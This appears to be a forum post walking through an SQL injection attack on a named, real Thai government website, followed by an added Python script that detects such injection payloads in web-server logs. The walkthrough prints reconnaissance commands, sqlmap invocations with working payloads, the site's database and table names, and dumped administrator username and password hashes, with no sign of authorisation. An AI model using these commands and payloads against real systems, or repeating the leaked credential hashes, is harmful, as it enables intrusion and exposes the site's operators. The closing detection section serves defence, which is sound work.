I'll also explain in the thread how I found the vulnerability, which is why I'm putting it behind a hide tag.
Code:
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# echo https://www.wiangcs.go.th/ | gau --mc 200 | tee url.txt
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# cat url.txt | gf sqli | tee sqli.txt
After that I went through the URLs in sqli.txt, appended a single quote to the id on the ones returning status code 200, and got an SQL syntax error.
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# sqlmap -u "https://www.wiangcs.go.th/?page=download_main&type=21&id=89" --random-agent --hex --batch -p id --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=download_main&type=21&id=89 AND 6113=6113
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=download_main&type=21&id=89 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x716b766a71,(SELECT (ELT(9266=9266,1))),0x717a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=download_main&type=21&id=89 AND (SELECT 1137 FROM (SELECT(SLEEP(5)))QbUU)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: page=download_main&type=21&id=89 UNION ALL SELECT CONCAT(0x716b766a71,0x6f5166706c564a68597853486c47704c6b755670774a544353796a696648626b534e484a6d757172,0x717a786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
available databases [2]:
[*] information_schema
[*] wiangcs_db2021
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# sqlmap -u "https://www.wiangcs.go.th/?page=download_main&type=21&id=89" --random-agent --hex --batch -p id -D wiangcs_db2021 --tables
Database: wiangcs_db2021
[51 tables]
+----------------------+
| tb_administor |
| tb_banner |
| tb_banner_type |
| tb_comment |
| tb_contact |
| tb_download_file |
| tb_download_last |
| tb_download_main |
| tb_download_sub |
| tb_download_type |
| tb_egp |
| tb_gallery |
| tb_gallery_images |
| tb_gallery_type |
| tb_hotline |
| tb_hotline_mail |
| tb_information_file |
| tb_information_last |
| tb_information_main |
| tb_information_sub |
| tb_information_type |
| tb_inner_doc |
| tb_intro |
| tb_ita |
| tb_ita_file |
| tb_ita_main |
| tb_ita_sub |
| tb_ita_type |
| tb_letter_news |
| tb_letter_news_type |
| tb_main_menu |
| tb_news |
| tb_news_images |
| tb_news_type |
| tb_personnel |
| tb_personnel_index |
| tb_personnel_type |
| tb_poll |
| tb_polls |
| tb_polls_choice |
| tb_polls_vote |
| tb_refcounters |
| tb_report |
| tb_sliders |
| tb_sliders_type |
| tb_sped_photo |
| tb_sped_photo_status |
| tb_youtube |
| tbl_egp |
| tbl_egp_category |
| user_online |
+----------------------+
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# sqlmap -u "https://www.wiangcs.go.th/?page=download_main&type=21&id=89" --random-agent --hex --batch -p id -D wiangcs_db2021 -T tb_administor --columns --dump
Database: wiangcs_db2021
Table: tb_administor
[4 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| date_change | datetime |
| id | int(11) |
| pwd | varchar(50) |
| usr | varchar(50) |
+-------------+-------------+
Database: wiangcs_db2021
Table: tb_administor
[1 entry]
+----+----------------------------------+----------------------------------+---------------------+
| id | pwd | usr | date_change |
+----+----------------------------------+----------------------------------+---------------------+
| 1 | 146038752b1263aea488bc39b6948d21 | aff28bb66d33a51728df17973e7e70a5 | 0000-00-00 00:00:00 |
+----+----------------------------------+----------------------------------+---------------------+
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# nth -t 146038752b1263aea488bc39b6948d21
_ _ _____ _ _ _ _ _
| \ | | |_ _| | | | | | | | | |
| \| | __ _ _ __ ___ ___ ______| | | |__ __ _| |_ ______| |_| | __ _ ___| |__
| . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______| _ |/ _` / __| '_ \
| |\ | (_| | | | | | | __/ | | | | | | (_| | |_ | | | | (_| \__ \ | | |
\_| \_/\__,_|_| |_| |_|\___| \_/ |_| |_|\__,_|\__| \_| |_/\__,_|___/_| |_|
https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash
146038752b1263aea488bc39b6948d21
Most Likely
MD5, HC: 0 JtR: raw-md5 Summary: Used for Linux Shadow files.
MD4, HC: 900 JtR: raw-md4
NTLM, HC: 1000 JtR: nt Summary: Often used in Windows Active Directory.
Domain Cached Credentials, HC: 1100 JtR: mscach
Least Likely
Domain Cached Credentials 2, HC: 2100 JtR: mscach2 Double MD5, HC: 2600 Tiger-128, Skein-256(128), Skein-512(128),
Lotus Notes/Domino 5, HC: 8600 JtR: lotus5 md5(md5(md5($pass))), HC: 3500 Summary: Hashcat mode is only supported in
hashcat-legacy. md5(uppercase(md5($pass))), HC: 4300 md5(sha1($pass)), HC: 4400 md5(utf16($pass)), JtR: dynamic_29
md4(utf16($pass)), JtR: dynamic_33 md5(md4($pass)), JtR: dynamic_34 Haval-128, JtR: haval-128-4 RIPEMD-128, JtR:
ripemd-128 MD2, JtR: md2 Snefru-128, JtR: snefru-128 DNSSEC(NSEC3), HC: 8300 RAdmin v2.x, HC: 9900 JtR: radmin Cisco
Type 7, BigCrypt, JtR: bigcrypt
┌──(root㉿aceveen1337)-[/home/aceveen1337/BugBounty]
└─# nth --text aff28bb66d33a51728df17973e7e70a5
aff28bb66d33a51728df17973e7e70a5
Most Likely
MD5, HC: 0 JtR: raw-md5 Summary: Used for Linux Shadow files.
MD4, HC: 900 JtR: raw-md4
NTLM, HC: 1000 JtR: nt Summary: Often used in Windows Active Directory.
Domain Cached Credentials, HC: 1100 JtR: mscach
Least Likely
Domain Cached Credentials 2, HC: 2100 JtR: mscach2 Double MD5, HC: 2600 Tiger-128, Skein-256(128), Skein-512(128),
Lotus Notes/Domino 5, HC: 8600 JtR: lotus5 md5(md5(md5($pass))), HC: 3500 Summary: Hashcat mode is only supported in
hashcat-legacy. md5(uppercase(md5($pass))), HC: 4300 md5(sha1($pass)), HC: 4400 md5(utf16($pass)), JtR: dynamic_29
md4(utf16($pass)), JtR: dynamic_33 md5(md4($pass)), JtR: dynamic_34 Haval-128, JtR: haval-128-4 RIPEMD-128, JtR:
ripemd-128 MD2, JtR: md2 Snefru-128, JtR: snefru-128
That's how I did it; it took about 3 minutes.
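From the defender's side, the sqlmap run above leaves a very recognisable trail in the web server's access log: one client cycling through a quote probe, a boolean "AND n=n" comparison, an INFORMATION_SCHEMA/FLOOR(RAND()) error-based query, a SLEEP() call and finally a UNION ALL SELECT against the same id parameter. The following Python script is an added example (not part of the original post and not a tool the author used) that flags those payload shapes in Combined Log Format lines. The log lines, IP addresses (RFC 5737 documentation ranges) and timestamps are constructed samples; the signature names and the minimum-technique threshold are my own choices.

```python
"""
Added detection example: flag access-log requests whose query string carries the
injection shapes sqlmap used in the post above (quote probe, boolean-blind,
error-based, time-based, UNION). Everything below is constructed sample data.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Signatures keyed by the sqlmap technique they correspond to. The quote probe is
# deliberately listed last: on its own it is low confidence (names like O'Brien
# trip it), so the scoring below only treats it as one signal among several.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "quote-probe": re.compile(r"['\"]\s*$"),
}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (not real traffic). The first client replays the probe
# sequence from the post; the second is ordinary browsing.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /?page=download_main&type=21&id=89 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2024:12:00:02 +0000] "GET /?page=download_main&type=21&id=89%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Jan/2024:12:00:03 +0000] "GET /?page=download_main&type=21&id=89%20AND%206113%3D6113 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2024:12:00:04 +0000] "GET /?page=download_main&type=21&id=89%20AND%20(SELECT%201137%20FROM%20(SELECT(SLEEP(5)))QbUU) HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2024:12:00:10 +0000] "GET /?page=download_main&type=21&id=89%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 6011
198.51.100.3 - - [10/Jan/2024:12:00:11 +0000] "GET /?page=news&id=12 HTTP/1.1" 200 4021
"""


def classify_request(target: str) -> list[str]:
    """Return the technique names whose signature matches any query-string value."""
    hits: list[str] = []
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            # parse_qs already URL-decoded once; decode again so that
            # double-encoded payloads (%2527 -> %27 -> ') are also seen.
            decoded = unquote_plus(value)
            for name, rx in SIGNATURES.items():
                if name not in hits and rx.search(decoded):
                    hits.append(name)
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each log line and keep those whose query matches at least one signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        techniques = classify_request(m["target"])
        if techniques:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "target": m["target"],
                "techniques": techniques,
            })
    return findings


def suspicious_sources(findings: list[dict], min_techniques: int = 2) -> dict[str, list[str]]:
    """Group findings by client IP. A source that cycles through several distinct
    techniques, as sqlmap does, is a far stronger signal than a lone quote probe."""
    per_ip: dict[str, set[str]] = {}
    for f in findings:
        per_ip.setdefault(f["ip"], set()).update(f["techniques"])
    return {ip: sorted(t) for ip, t in per_ip.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['status']} {f['techniques']} {f['target']}")
    print("suspicious sources:", suspicious_sources(found))
```

Run stand-alone it prints the four flagged requests from 203.0.113.7 and reports that source as suspicious with all four techniques, while 198.51.100.3 stays clean. The quote probe returning a 500 is the moment the post describes ("got an SQL syntax error"); correlating that status with the probe pattern, and alerting on one client accumulating several techniques within a short window, is what turns these regexes into a usable alert. Detection is the second line, though: the root cause visible in the sqlmap output is a GET `id` value concatenated into a MySQL query, and the dump shows why the impact is so severe, since the only administrator row stores credentials as bare 32-hex-character digests that nth rates as most likely MD5.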